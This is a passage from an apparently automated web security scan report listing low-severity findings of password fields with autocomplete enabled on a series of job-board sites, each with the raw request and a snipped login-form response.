X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:51:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Fri, 21-Jan-11 20:11:48 GMT;path=/
Content-Length: 212811


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
<body id="ctl00_ctl00_ctl00_BodyTag">
<form name="aspnetForm" method="post" action="/Secured/Content/Forms/Login.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm" onreset="if (window.setTimeout) window.setTimeout('VAM_OnReset(false);', 100);">
<div>
...[SNIP]...
<div class="signInInput">
                            <input name="ctl00$ctl00$ctl00$MasterContent$SideNavContent$tbPassword" type="password" maxlength="32" id="ctl00_ctl00_ctl00_MasterContent_SideNavContent_tbPassword" class="regTextBox" style="width:200px;" />
                            <span style='visibility:hidden' class='VAMErrorText' id='ctl00_ctl00_ctl00_MasterContent_SideNavContent_reqtbPassword'>
...[SNIP]...
<td valign="middle">
                                               <input name="ctl00$ctl00$ctl00$MasterContent$SideNavContent$tbMFAnswer" type="password" maxlength="50" id="ctl00_ctl00_ctl00_MasterContent_SideNavContent_tbMFAnswer" onkeypress="return(VAM_KeyPress(this, event))" onkeydown="return(VAM_OnKeyDown(this, event))" style="width:182px;" />
                                           </td>
...[SNIP]...

11.20. http://www.businessanalystcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.businessanalystcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

http://www.businessanalystcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.businessanalystcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:41 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kldqa0cqamr0mp6anoh752e7o2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:41 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 124047

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.businessanalystcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.21. http://www.businessdevelopmentcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.businessdevelopmentcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

http://www.businessdevelopmentcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.businessdevelopmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:41 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ru1216s8gi6hento64jtdlqce3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:41 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116452

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.businessdevelopmentcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.22. http://www.callcentercrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.callcentercrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

http://www.callcentercrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.callcentercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=prr05v672vhpd9l46bt5lu88r3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:44 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 128551

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.callcentercrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.23. http://www.chefcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.chefcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

http://www.chefcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.chefcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ha4et9frtsniged97g2n86qvf0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108888

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.chefcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.24. http://www.civilengineeringcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.civilengineeringcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

http://www.civilengineeringcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.civilengineeringcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:59 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=soga8db6spril7hls6mrahaid5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:59 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106801

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.civilengineeringcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.25. http://www.clevelcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.clevelcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

http://www.clevelcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.clevelcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:10 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=7grpnh4ane7h6vq7m94a09osd0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:10 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 115509

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.clevelcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.26. http://www.clinicalresearchcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.clinicalresearchcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

http://www.clinicalresearchcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.clinicalresearchcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:18 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pot86ho5ls3u8ap2dd0c7javd7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:18 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 101472

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.clinicalresearchcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.27. http://www.compliancecrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.compliancecrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

http://www.compliancecrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.compliancecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:20 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=t20irb9usa5ru4jlcuufdl43b5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:20 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 135192

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.compliancecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.28. http://www.computeraideddesigncrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.computeraideddesigncrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

http://www.computeraideddesigncrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.computeraideddesigncrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:21 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=i4i09jl3sjo0digpp5qe6oqa75; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 121001

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.computeraideddesigncrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.29. http://www.constructioncrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.constructioncrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

http://www.constructioncrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.constructioncrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6c5ho2kr4aaj7if0r37e83a520; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 131637

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.constructioncrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.30. http://www.consultingcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.consultingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

http://www.consultingcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.consultingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:22 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=cd981ht9vh5kim10q4v8a0ih67; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111912

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.consultingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.31. http://www.contractmanagementcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.contractmanagementcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

http://www.contractmanagementcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
